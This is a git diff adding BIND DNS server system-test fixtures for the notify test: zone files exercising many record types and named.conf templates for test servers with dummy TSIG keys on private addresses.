--git a/bin/tests/system/notify/ns1/root.db b/bin/tests/system/notify/ns1/root.db new file mode 100644 index 0000000..17780d1 --- /dev/null +++ b/bin/tests/system/notify/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/notify/ns2/example1.db b/bin/tests/system/notify/ns2/example1.db new file mode 100644 index 0000000..3b8d33b --- /dev/null +++ b/bin/tests/system/notify/ns2/example1.db @@ -0,0 +1,144 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.0.0.1 +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . +$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. +$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/notify/ns2/example2.db b/bin/tests/system/notify/ns2/example2.db new file mode 100644 index 0000000..c762dd6 --- /dev/null +++ b/bin/tests/system/notify/ns2/example2.db @@ -0,0 +1,144 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 2 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.0.0.2 +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . +$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. +$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/notify/ns2/example3.db b/bin/tests/system/notify/ns2/example3.db new file mode 100644 index 0000000..dd3371b --- /dev/null +++ b/bin/tests/system/notify/ns2/example3.db @@ -0,0 +1,144 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 3 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.0.0.3 +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . +$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. +$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/notify/ns2/example4.db b/bin/tests/system/notify/ns2/example4.db new file mode 100644 index 0000000..86d9bf2 --- /dev/null +++ b/bin/tests/system/notify/ns2/example4.db @@ -0,0 +1,144 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 4 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.0.0.4 +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . +$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. +$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/notify/ns2/generic.db b/bin/tests/system/notify/ns2/generic.db new file mode 100644 index 0000000..108b552 --- /dev/null +++ b/bin/tests/system/notify/ns2/generic.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 diff --git a/bin/tests/system/notify/ns2/named.conf.in b/bin/tests/system/notify/ns2/named.conf.in new file mode 100644 index 0000000..13b3797 --- /dev/null +++ b/bin/tests/system/notify/ns2/named.conf.in @@ -0,0 +1,84 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + startup-notify-rate 5; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; + // Check that named can handle a empty also-notify. + also-notify { /* empty */ }; +}; + +# use both 'primaries' and 'masters' to test that they +# can work correctly together. +primaries noport { 10.53.0.4; }; +masters x21 port @EXTRAPORT1@ { noport; }; + +zone x1 { + type primary; + file "generic.db"; + also-notify { 10.53.0.3; }; + notify primary-only; +}; +zone x2 { + type primary; + file "generic.db"; + also-notify { 10.53.0.3; }; + notify master-only; # test old syntax +}; + +zone x3 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x4 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x5 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x6 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x7 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x8 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x9 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x10 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x11 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x12 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x13 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x14 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x15 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x16 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x17 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x18 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x19 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x20 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; }; +zone x21 { type primary; file "x21.db"; allow-update { any; }; also-notify { x21; }; }; diff --git a/bin/tests/system/notify/ns3/named.conf.in b/bin/tests/system/notify/ns3/named.conf.in new file mode 100644 index 0000000..e364e60 --- /dev/null +++ b/bin/tests/system/notify/ns3/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type secondary; + primaries { 10.53.0.2; }; + file "example.bk"; +}; diff --git a/bin/tests/system/notify/ns4/named.conf.in b/bin/tests/system/notify/ns4/named.conf.in new file mode 100644 index 0000000..f20d2eb --- /dev/null +++ b/bin/tests/system/notify/ns4/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @EXTRAPORT1@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "x21" { + type secondary; + primaries { 10.53.0.2 port @PORT@; }; + file "x21.bk"; +}; diff --git a/bin/tests/system/notify/ns4/named.port.in b/bin/tests/system/notify/ns4/named.port.in new file mode 100644 index 0000000..8e94a3c --- /dev/null +++ b/bin/tests/system/notify/ns4/named.port.in @@ -0,0 +1 @@ +@EXTRAPORT1@ diff --git a/bin/tests/system/notify/ns5/named.conf.in b/bin/tests/system/notify/ns5/named.conf.in new file mode 100644 index 0000000..5cab276 --- /dev/null +++ b/bin/tests/system/notify/ns5/named.conf.in @@ -0,0 +1,69 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key "a" { + algorithm "hmac-md5"; + secret "aaaaaaaaaaaaaaaaaaaa"; +}; + +key "b" { + algorithm "hmac-md5"; + secret "bbbbbbbbbbbbbbbbbbbb"; +}; + +key "c" { + algorithm "hmac-md5"; + secret "cccccccccccccccccccc"; +}; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +view "a" { + match-clients { key "a"; }; + zone "x21" { + type primary; + also-notify { 10.53.0.5 key "b"; 10.53.0.5 key "c"; }; + file "x21.db"; + allow-update { any; }; + }; +}; + +view "b" { + match-clients { key "b"; }; + zone "x21" { + type secondary; + primaries { 10.53.0.5 key "a"; }; + file "x21.bk-b"; + notify no; + }; +}; + +view "c" { + match-clients { key "c"; }; + zone "x21" { + type secondary; + primaries { 10.53.0.5 key "a"; }; + file "x21.bk-c"; + notify no; + }; +}; diff --git a/bin/tests/system/notify/ns5/x21.db b/bin/tests/system/notify/ns5/x21.db new file mode 100644 index 0000000..8f2ac7d --- /dev/null +++ b/bin/tests/system/notify/ns5/x21.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 300 